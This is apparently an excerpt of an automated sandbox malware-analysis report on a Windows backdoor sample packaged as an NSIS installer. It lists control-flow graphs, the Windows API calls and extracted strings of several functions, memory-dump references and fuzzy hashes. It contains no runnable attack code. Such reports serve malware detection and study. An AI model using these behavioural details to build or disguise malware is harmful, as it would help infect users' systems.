                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                      • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$open cmd
                                                      • API String ID: 606308-2950417684
                                                      • Opcode ID: a421e183573b9f452b9ca09e15ef6a2d82480133861b32aad243b677c75c9e6c
                                                      • Instruction ID: 5e1ff83f83eb9308ce16c84110d2fcc5f4f6a1078aae304d5a5647478e66a4f2
                                                      • Opcode Fuzzy Hash: a421e183573b9f452b9ca09e15ef6a2d82480133861b32aad243b677c75c9e6c
                                                      • Instruction Fuzzy Hash: 0661A270240700BAD320AB669D45F2B3A6CEBC5B49F40853FF942B26E1DB7D9901CB6D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 214 40307d-4030cb GetTickCount GetModuleFileNameW call 40600a 217 4030d7-403105 call 40651a call 405e35 call 40651a GetFileSize 214->217 218 4030cd-4030d2 214->218 226 4031f0-4031fe call 403019 217->226 227 40310b 217->227 219 4032ad-4032b1 218->219 233 403200-403203 226->233 234 403253-403258 226->234 229 403110-403127 227->229 231 403129 229->231 232 40312b-403134 call 4034ac 229->232 231->232 239 40325a-403262 call 403019 232->239 240 40313a-403141 232->240 236 403205-40321d call 4034c2 call 4034ac 233->236 237 403227-403251 GlobalAlloc call 4034c2 call 4032b4 233->237 234->219 236->234 261 40321f-403225 236->261 237->234 265 403264-403275 237->265 239->234 243 403143-403157 call 405fc5 240->243 244 4031bd-4031c1 240->244 252 4031cb-4031d1 243->252 263 403159-403160 243->263 251 4031c3-4031ca call 403019 244->251 244->252 251->252 254 4031e0-4031e8 252->254 255 4031d3-4031dd call 4069d4 252->255 254->229 264 4031ee 254->264 255->254 261->234 261->237 263->252 267 403162-403169 263->267 264->226 268 403277 265->268 269 40327d-403282 265->269 267->252 270 40316b-403172 267->270 268->269 271 403283-403289 269->271 270->252 272 403174-40317b 270->272 271->271 273 40328b-4032a6 SetFilePointer call 405fc5 271->273 272->252 274 40317d-40319d 272->274 276 4032ab 273->276 274->234 277 4031a3-4031a7 274->277 276->219 278 4031a9-4031ad 277->278 279 4031af-4031b7 277->279 278->264 278->279 279->252 280 4031b9-4031bb 279->280 280->252
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 0040308E
                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe,00000400,?,?,?,?,?,0040385A,?), ref: 004030AA
                                                        • Part of subcall function 0040600A: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe,80000000,00000003,?,?,?,?,?,0040385A,?), ref: 0040600E
                                                        • Part of subcall function 0040600A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040385A,?), ref: 00406030
                                                      • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe,C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe,80000000,00000003,?,?,?,?,?,0040385A), ref: 004030F6
                                                      • GlobalAlloc.KERNELBASE(00000040,Z8@,?,?,?,?,?,0040385A,?), ref: 0040322C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                      • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$Z8@$soft
                                                      • API String ID: 2803837635-4173278297
                                                      • Opcode ID: 228fa0226a90281b4f2baa84689300d30e54d034f1a820beff8a1dc93a475882
                                                      • Instruction ID: 1f061f0c38a4f693c331b34270bc70c7c89456ffd71d5a2abe04866b7cb55e0c
                                                      • Opcode Fuzzy Hash: 228fa0226a90281b4f2baa84689300d30e54d034f1a820beff8a1dc93a475882
                                                      • Instruction Fuzzy Hash: 9551D071901204ABDB10AF65DD82B9E7FA8EB44756F10853BE501FA2C1CB7C8F418B5D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 281 406557-406562 282 406564-406573 281->282 283 406575-40658b 281->283 282->283 284 4065a3-4065ac 283->284 285 40658d-40659a 283->285 287 4065b2 284->287 288 406787-406792 284->288 285->284 286 40659c-40659f 285->286 286->284 289 4065b7-4065c4 287->289 290 406794-406798 call 40651a 288->290 291 40679d-40679e 288->291 289->288 292 4065ca-4065d3 289->292 290->291 294 406765 292->294 295 4065d9-406616 292->295 296 406773-406776 294->296 297 406767-406771 294->297 298 406709-40670e 295->298 299 40661c-406623 295->299 300 406778-406781 296->300 297->300 301 406710-406716 298->301 302 406741-406746 298->302 303 406625-406627 299->303 304 406628-40662a 299->304 300->288 305 4065b4 300->305 306 406726-406732 call 40651a 301->306 307 406718-406724 call 406461 301->307 310 406755-406763 lstrlenW 302->310 311 406748-406750 call 406557 302->311 303->304 308 406667-40666a 304->308 309 40662c-406653 call 4063e8 304->309 305->289 322 406737-40673d 306->322 307->322 313 40667a-40667d 308->313 314 40666c-406678 GetSystemDirectoryW 308->314 324 4066f0-4066f4 309->324 326 406659-406662 call 406557 309->326 310->300 311->310 319 4066e6-4066e8 313->319 320 40667f-40668d GetWindowsDirectoryW 313->320 318 4066ea-4066ee 314->318 318->324 325 406701-406707 call 4067a1 318->325 319->318 328 40668f-406697 319->328 320->319 322->310 327 40673f 322->327 324->325 329 4066f6-4066fc lstrcatW 324->329 325->310 326->318 327->325 332 406699-4066a2 328->332 333 4066ae-4066c4 SHGetSpecialFolderLocation 328->333 329->325 338 4066aa-4066ac 332->338 336 4066e2 333->336 337 4066c6-4066e0 SHGetPathFromIDListW CoTaskMemFree 333->337 336->319 337->318 337->336 338->318 338->333
                                                      APIs
                                                      • GetSystemDirectoryW.KERNEL32(open cmd,00000400), ref: 00406672
                                                      • GetWindowsDirectoryW.KERNEL32(open cmd,00000400,00000000,007A0F28,?,004055B3,007A0F28,00000000,00000000,0079DF00,771B23A0), ref: 00406685
                                                      • lstrcatW.KERNEL32(open cmd,\Microsoft\Internet Explorer\Quick Launch), ref: 004066FC
                                                      • lstrlenW.KERNEL32(open cmd,00000000,007A0F28,?,004055B3,007A0F28,00000000), ref: 00406756
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: Directory$SystemWindowslstrcatlstrlen
                                                      • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$open cmd
                                                      • API String ID: 4260037668-4218211737
                                                      • Opcode ID: 96fea232bba9f539859174344ba2078cdcaa49a508c9a356705917328f4b5d31
                                                      • Instruction ID: 9e459ffa4d797bbc81f49b8710fc234ac44c95668d32beb4df18aeb57a87e6f9
                                                      • Opcode Fuzzy Hash: 96fea232bba9f539859174344ba2078cdcaa49a508c9a356705917328f4b5d31
                                                      • Instruction Fuzzy Hash: E061D271900206AADF109F64DC40BAE37A5AF55318F22C13BE917B72D0DB7D8AA1CB5D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 339 40176f-401794 call 402da6 call 405e60 344 401796-40179c call 40651a 339->344 345 40179e-4017b0 call 40651a call 405de9 lstrcatW 339->345 350 4017b5-4017b6 call 4067a1 344->350 345->350 354 4017bb-4017bf 350->354 355 4017c1-4017cb call 406850 354->355 356 4017f2-4017f5 354->356 363 4017dd-4017ef 355->363 364 4017cd-4017db CompareFileTime 355->364 358 4017f7-4017f8 call 405fe5 356->358 359 4017fd-401819 call 40600a 356->359 358->359 366 40181b-40181e 359->366 367 40188d-4018b6 call 40557c call 4032b4 359->367 363->356 364->363 368 401820-40185e call 40651a * 2 call 406557 call 40651a call 405b7a 366->368 369 40186f-401879 call 40557c 366->369 381 4018b8-4018bc 367->381 382 4018be-4018ca SetFileTime 367->382 368->354 402 401864-401865 368->402 379 401882-401888 369->379 383 402c33 379->383 381->382 385 4018d0-4018db FindCloseChangeNotification 381->385 382->385 387 402c35-402c39 383->387 388 4018e1-4018e4 385->388 389 402c2a-402c2d 385->389 391 4018e6-4018f7 call 406557 lstrcatW 388->391 392 4018f9-4018fc call 406557 388->392 389->383 396 401901-4023a2 call 405b7a 391->396 392->396 396->387 396->389 402->379 404 401867-401868 402->404 404->369
                                                      APIs
                                                      • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                      • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache,?,?,00000031), ref: 004017D5
                                                        • Part of subcall function 0040651A: lstrcpynW.KERNEL32(?,?,00000400,0040367A,007A7A60,NSIS Error), ref: 00406527
                                                        • Part of subcall function 0040557C: lstrlenW.KERNEL32(007A0F28,00000000,0079DF00,771B23A0,?,?,?,?,?,?,?,?,?,004033F5,00000000,?), ref: 004055B4
                                                        • Part of subcall function 0040557C: lstrlenW.KERNEL32(004033F5,007A0F28,00000000,0079DF00,771B23A0,?,?,?,?,?,?,?,?,?,004033F5,00000000), ref: 004055C4
                                                        • Part of subcall function 0040557C: lstrcatW.KERNEL32(007A0F28,004033F5), ref: 004055D7
                                                        • Part of subcall function 0040557C: SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004055E9
                                                        • Part of subcall function 0040557C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040560F
                                                        • Part of subcall function 0040557C: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405629
                                                        • Part of subcall function 0040557C: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405637
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                      • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache$open$open cmd
                                                      • API String ID: 1941528284-535101974
                                                      • Opcode ID: 2bbae9972c0614687d46280820d7d109de85215e056eb0cc334133bd45af8cb0
                                                      • Instruction ID: 5ac910c5439316a1e26e23cc6d9244c071f0fb36d70bd55283583498c2888f83
                                                      • Opcode Fuzzy Hash: 2bbae9972c0614687d46280820d7d109de85215e056eb0cc334133bd45af8cb0
                                                      • Instruction Fuzzy Hash: 9841A271900108BACF11BBB5DD85DAE3A79EF4536CB20423FF412B50E1DA3C8A519A6E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 405 4032b4-4032cb 406 4032d4-4032dd 405->406 407 4032cd 405->407 408 4032e6-4032eb 406->408 409 4032df 406->409 407->406 410 4032fb-403308 call 4034ac 408->410 411 4032ed-4032f6 call 4034c2 408->411 409->408 415 40349a 410->415 416 40330e-403312 410->416 411->410 417 40349c-40349d 415->417 418 403445-403447 416->418 419 403318-40333e GetTickCount 416->419 422 4034a5-4034a9 417->422 420 403487-40348a 418->420 421 403449-40344c 418->421 423 4034a2 419->423 424 403344-40334c 419->424 425 40348c 420->425 426 40348f-403498 call 4034ac 420->426 421->423 427 40344e 421->427 423->422 428 403351-40335f call 4034ac 424->428 429 40334e 424->429 425->426 426->415 439 40349f 426->439 432 403451-403457 427->432 428->415 438 403365-40336e 428->438 429->428 435 403459 432->435 436 40345b-403469 call 4034ac 432->436 435->436 436->415 442 40346b-403477 call 4060bc 436->442 441 403374-403394 call 406a42 438->441 439->423 447 40339a-4033ad GetTickCount 441->447 448 40343d-40343f 441->448 449 403441-403443 442->449 450 403479-403483 442->450 451 4033f8-4033fa 447->451 452 4033af-4033b7 447->452 448->417 449->417 450->432 453 403485 450->453 456 403431-403435 451->456 457 4033fc-403400 451->457 454 4033b9-4033bd 452->454 455 4033bf-4033f5 MulDiv wsprintfW call 40557c 452->455 453->423 454->451 454->455 455->451 456->424 458 40343b 456->458 460 403402-403409 call 4060bc 457->460 461 403417-403422 457->461 458->423 465 40340e-403410 460->465 463 403425-403429 461->463 463->441 466 40342f 463->466 465->449 467 403412-403415 465->467 466->423 467->463
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: CountTick$wsprintf
                                                      • String ID: ... %d%%$Z8@
                                                      • API String ID: 551687249-843941321
                                                      • Opcode ID: 67e296ff4565807106035eaab5f2577f851fd332784b09125895019d099d7f68
                                                      • Instruction ID: 2eef5f2140e491494c2db8857c7661a7403dfcbdcc622e4f150acafc5917097d
                                                      • Opcode Fuzzy Hash: 67e296ff4565807106035eaab5f2577f851fd332784b09125895019d099d7f68
                                                      • Instruction Fuzzy Hash: 59516C71800219EBDB11DF55DA84B9E7FB8AF40326F14417BE814BA2C1D7789F408BAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 468 406877-406897 GetSystemDirectoryW 469 406899 468->469 470 40689b-40689d 468->470 469->470 471 4068ae-4068b0 470->471 472 40689f-4068a8 470->472 474 4068b1-4068e4 wsprintfW LoadLibraryExW 471->474 472->471 473 4068aa-4068ac 472->473 473->474
                                                      APIs
                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040688E
                                                      • wsprintfW.USER32 ref: 004068C9
                                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068DD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                      • String ID: %s%S.dll$UXTHEME$\
                                                      • API String ID: 2200240437-1946221925
                                                      • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                      • Instruction ID: cdb972a85fe13f574061c7118b8c5d4b466341d866a79bb5796beb4354b5a6e3
                                                      • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                      • Instruction Fuzzy Hash: E9F0F671511119A7DF10BB64DD0DF9B376CAF00305F11447AAA46F10E0EB7CDA68CBA8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 475 406039-406045 476 406046-40607a GetTickCount GetTempFileNameW 475->476 477 406089-40608b 476->477 478 40607c-40607e 476->478 480 406083-406086 477->480 478->476 479 406080 478->479 479->480
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00406057
                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,00403508,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037ED), ref: 00406072
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: CountFileNameTempTick
                                                      • String ID: C:\Users\user~1\AppData\Local\Temp\$nsa
                                                      • API String ID: 1716503409-3083371207
                                                      • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                      • Instruction ID: d9a4429216a2c16f2b1e0ff0632edab8c7003fcac11a898ec3991e0c35e2d836
                                                      • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                      • Instruction Fuzzy Hash: 84F0F076B40204BFEB00CF59ED05E9EB7ACEB95750F01803AEE45F3140E6B099648768
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 481 4015c1-4015d5 call 402da6 call 405e94 486 401631-401634 481->486 487 4015d7-4015ea call 405e16 481->487 489 401663-4022f6 call 401423 486->489 490 401636-401655 call 401423 call 40651a SetCurrentDirectoryW 486->490 494 401604-401607 call 405ac8 487->494 495 4015ec-4015ef 487->495 502 402c2a-402c39 489->502 503 40292e-402935 489->503 490->502 511 40165b-40165e 490->511 504 40160c-40160e 494->504 495->494 499 4015f1-4015f8 call 405ae5 495->499 499->494 515 4015fa-401602 call 405a4b 499->515 503->502 507 401610-401615 504->507 508 401627-40162f 504->508 512 401624 507->512 513 401617-401622 GetFileAttributesW 507->513 508->486 508->487 511->502 512->508 513->508 513->512 515->504
                                                      APIs
                                                        • Part of subcall function 00405E94: CharNextW.USER32(?,?,007A4750,?,00405F08,007A4750,007A4750,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C46,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405EA2
                                                        • Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EA7
                                                        • Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EBF
                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                        • Part of subcall function 00405A4B: CreateDirectoryW.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 00405A8E
                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache,?,00000000,000000F0), ref: 0040164D
                                                      Strings
                                                      • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 00401640
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                      • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
                                                      • API String ID: 1892508949-3291747264
                                                      • Opcode ID: 5737488d322210aef038a15db73d02009b1a21ccc104f7f50523705260184c44
                                                      • Instruction ID: b26d59bbbb8bd31aa62bfaa3988508fb5429084e49f4d8f394da2dab55023cb6
                                                      • Opcode Fuzzy Hash: 5737488d322210aef038a15db73d02009b1a21ccc104f7f50523705260184c44
                                                      • Instruction Fuzzy Hash: E611E631504115EBCF216FA5CD40A9F36A0EF15369B28493BF541B52F1DA3E4A819F4D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
